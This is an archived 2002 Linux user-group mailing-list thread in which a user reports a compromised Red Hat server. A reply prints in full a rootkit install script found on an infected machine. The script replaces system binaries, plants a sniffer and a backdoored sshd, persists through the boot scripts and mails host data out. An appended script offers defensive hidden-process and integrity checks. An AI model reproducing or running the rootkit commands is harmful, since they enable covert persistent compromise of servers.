Hello Petre, Saturday, May 25, 2002, 5:14:28 PM, you wrote:
PD> 2 mbps with abuse.zone.ro, let's say.. let's first see whether there is any interest on the part of the "target" :)

Gusherul

PD> /me
PD> At 01:08 PM 5/25/02 -0700, you wrote:
>>Hello paul,
>>
>>One thing is good at least: you told me the e-mail address. Whoever else has
>>rootkits, chime in with the e-mail addresses where the info about the server
>>gets sent. That way we get rid of them a little :)
>>
>>Gushterul
>>P.S. By the way, what about a web page with all of them? Not to put the rk
>>there, but info so people know whom to go after. Let me rephrase: who does
>>the hosting? :)
>>
>>Friday, May 24, 2002, 11:38:02 PM, you wrote:
>>
>>pzeur> Reinstall everything, then register with rhn_register at the RH network, and
>>pzeur> once you have enrolled your system with them you can use "up2date -u" for
>>pzeur> up-to-date updates. It looks like wingoz but works fine.
>>pzeur> If you have connection problems, let it fetch the headers, which it puts in
>>pzeur> /var/spool/up2date (you have about 200 MB of updates to download), look for
>>pzeur> a nearby mirror of updates.redhat.com (e.g. ftp.ubbcluj.ro), fetch the
>>pzeur> packages matching the headers from there, put them in /var/spool/up2date
>>pzeur> and restart "up2date -u".
>>
>>
>>pzeur> My wu-ftpd from rh7.2 got holed too, but the rootkit was for another system,
>>pzeur> so I found it after about 3 hours (I was waiting for "up2date -u" to finish
>>pzeur> with the services running, like the ox I was :) when ps, ls, netstat didn't
>>pzeur> work. So I quickly brought over those apps from another system, and
>>pzeur> surprise... nfsd -q -p 50000, which was a modified sshd. I looked through the
>>pzeur> directories and found in /var/ftp/ a directory that was not there the last
>>pzeur> time I looked. Searching through the files in it I came across a path to some
>>pzeur> library directory where there was roughly this:
>>pzeur> .
>>pzeur> ..
>>pzeur> .lib
>>pzeur> .tooz
>>
>>pzeur> in .tooz was the install file:
>>pzeur> #private version from cur / not hacked by lamme assz as Em|nem or others!
>>pzeur> #phear my reverge all u mother fuckers
>>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun
>>pzeur> #!/bin/sh
>>pzeur> unset HISTFILE
>>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/
>>pzeur> chattr -iau /bin/ps
>>pzeur> chattr -iau /bin/ls
>>pzeur> chattr -iau /bin/netstat
>>pzeur> chattr -iau /bin/lpd
>>pzeur> rm -rf /etc/ssh*
>>pzeur> clear
>>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib
>>sh sysinfo1 >> new-host
>>pzeur> sh ssh_random_key
>>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/
>>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/
>>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/
>>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps
>>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls
>>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc
>>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr
>>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file
>>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps
>>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls
>>pzeur> mv ps /bin/ps
>>pzeur> mv ls /bin/ls
>>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/
>>pzeur> mv netstat /bin/netstat
>>pzeur> chown root.root /bin/ls
>>pzeur> chown root.root /bin/ps
>>pzeur> chown root.root /bin/netstat
>>pzeur> mv linsniffer /bin/lpd
>>pzeur> rm -rf /etc/ssh*
>>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8
>>pzeur> rm -rf /usr/sbin/rpc.rstatd
>>pzeur> rm -rf /usr/sbin/rpc*
>>pzeur> lpd &
>>pzeur> ./lpd
>>pzeur> mv sshd /bin/nfsd
>>pzeur> mv -f sshd_config /etc/
>>pzeur> mv -f ssh_host_key /etc/
>>pzeur> mv -f ssh_random_seed /etc/
>>pzeur> mv -f ssh_host_key.pub /etc/
>>pzeur> rm -rf ssh_random_key
>>pzeur> chattr +iau /bin/nfsd
>>pzeur> chattr +iau /etc/sshd_config
>>pzeur> chattr +iau /etc/ssh_host_key
>>pzeur> chattr +iau /etc/ssh_random_seed
>>pzeur> chattr +iau /etc/ssh_host_key.pub
>>pzeur> nfsd -q -p 50000
>>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit
>>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet
>>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED]
>>pzeur> cat new-host |mail -s
>>pzeur> #-----done with ssh----
>>pzeur> killall -9 portmap
>>pzeur> killall rpc.statd
>>pzeur> rm -f /usr/sbin/rpc.statd
>>echo "ftp">>>/etc/ftpusers
>>echo "root">>>/etc/ftpusers
>>pzeur> cat /proc/cpuinfo
>>pzeur> mv pwd /dev/capi20.20
>>pzeur> rm -f sysinfo1
>>pzeur> rm -f sysinfo
>>pzeur> rm -f new-host
>>pzeur> rm -f sshd
>>pzeur> cd ..
>>pzeur> rm -rf s.tgz
>>pzeur> clear
>>pzeur> echo "****************************7.1***************************"
>>pzeur> echo "Oki"
>>pzeur> echo "***********************SpUrKaTu&TrUnKS********************"
>>
>>
>>pzeur> there was also a file .1addr:
>>pzeur> 2 194.105
>>pzeur> 3 6666
>>pzeur> 3 6667
>>pzeur> 3 54789
>>pzeur> 3 31337
>>pzeur> 3 6668
>>pzeur> 3 6669
>>pzeur> 3 6666
>>pzeur> 2 194.102.233
>>pzeur> 2 209.142.209.161
>>pzeur> 2 217.10
>>pzeur> 2 213.233
>>
>>
>>pzeur> I kept the files, because you never know; among them there are also:
>>pzeur> hideps install lpd sense string tcp.log utils wipe
>>pzeur> .1addr .1file .1proc .ls netstat .ps
>>
>>pzeur> that's about what else I found
>>
>>pzeur> in general it's good to have original copies of ls, ps, netstat
>>
>>pzeur> good luck
>>
>>
>>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote:
>>
>> >> I'm running an RH 7.2 system on which I detected an intrusion.
>> >> I realized this because certain commands weren't working correctly.
>> >> 1. I repaired the compromised packages (net-tools, fileutils and procps) with
>> >> rpm -U --force ...
>> >> 2. I downloaded chkrootkit, and chkproc tells me there are 2 hidden processes
>> >> running:
>> >> - You have 1 process hidden for readdir command
>> >> - You have 1 process hidden for ps command
>> >> 3. chkrootkit "freezes" during the check at the position
>> >> Checking 'aliens'...
>> >> 4. When I reboot the PC it gives me some errors when unmounting the /usr partition
>> >> --> Illegal seek
>> >> 5. When I boot, a few messages appear saying that some program is shareware
>> >> and whatnot... and that it's listening on port 7000
>> >> 6. In boot.log the line appears
>> >> ... Starting backdoor daemon... Done, pid=...
>> >> Now I ask you:
>> >> - could there be other compromised packages besides the ones named?
>> >> - what's with those hidden processes and how do I get rid of them?
>> >> - why does chkrootkit freeze?
>> >> - if it really is a backdoor, how do I get rid of it?
>> >>
>> >> Hoping I'm not "annoying" you with such a long mail, thank you in advance
>> >> for the help.
>> >> Gaby
--- To unsubscribe, send mail to [EMAIL PROTECTED] with the subject 'unsubscribe rlug'. RULES, archives and other information: http://www.lug.ro/mlist/
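The two checks the thread points at, the hidden-process comparison behind chkproc's "process hidden for ps command" message that Gaby quotes and pzeur's advice to keep trusted copies of ls, ps and netstat, as an added shell example (my code, not from the list, from chkrootkit or from any of the posters; the function names, the RUN_LIVE variable and the baseline-file format are my own assumptions):

```shell
#!/bin/sh
# Added example (mine, not from the thread or from chkrootkit): two defender
# checks for the situation in the mails above. Function names, the RUN_LIVE
# variable and the baseline-file format are my own choices.

# Hidden-process check, the idea behind chkproc's "process hidden for ps
# command": a PID with a /proc/<pid> directory that is absent from ps output.
# Takes both PID lists as arguments so it can be tested on fixed input.
find_hidden_pids() {
    ps_list=" $(printf '%s' "$2" | tr '\n' ' ') "   # flatten to one line
    hidden=""
    for pid in $1; do
        case "$ps_list" in
            *" $pid "*) ;;                  # ps reports it: fine
            *) hidden="$hidden $pid" ;;     # in /proc, missing from ps
        esac
    done
    printf '%s\n' "${hidden# }"
}

# Live wrapper. /proc is enumerated with a shell glob instead of /bin/ls,
# because the install script above swaps ls (and ps) for trojaned copies;
# the check works by comparing two views that are hard to fake together.
live_hidden_pids() {
    proc_list=""
    for d in /proc/[0-9]*; do proc_list="$proc_list ${d#/proc/}"; done
    ps_live=$(ps -e -o pid= 2>/dev/null) || return 2   # no usable ps
    confirmed=""
    for pid in $(find_hidden_pids "$proc_list" "$ps_live"); do
        # A process that merely exited between the two listings is not hidden.
        [ -d "/proc/$pid" ] && confirmed="$confirmed $pid"
    done
    printf '%s\n' "${confirmed# }"
}

# Integrity baseline for the binaries the script swaps out (ps, ls, netstat),
# following the "keep original copies" advice: record the hashes on a clean
# install, keep the file off the box, verify later. Exit 0 means unchanged.
record_baseline() {   # $1 = baseline file, remaining args = files to hash
    out=$1; shift
    sha256sum "$@" > "$out"
}
verify_baseline() {   # $1 = baseline file
    sha256sum -c "$1" > /dev/null 2>&1
}

# Usage: RUN_LIVE=1 sh check.sh   (prints confirmed hidden PIDs, if any)
if [ -n "$RUN_LIVE" ]; then
    found=$(live_hidden_pids) && [ -n "$found" ] && echo "hidden PIDs: $found"
fi
```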
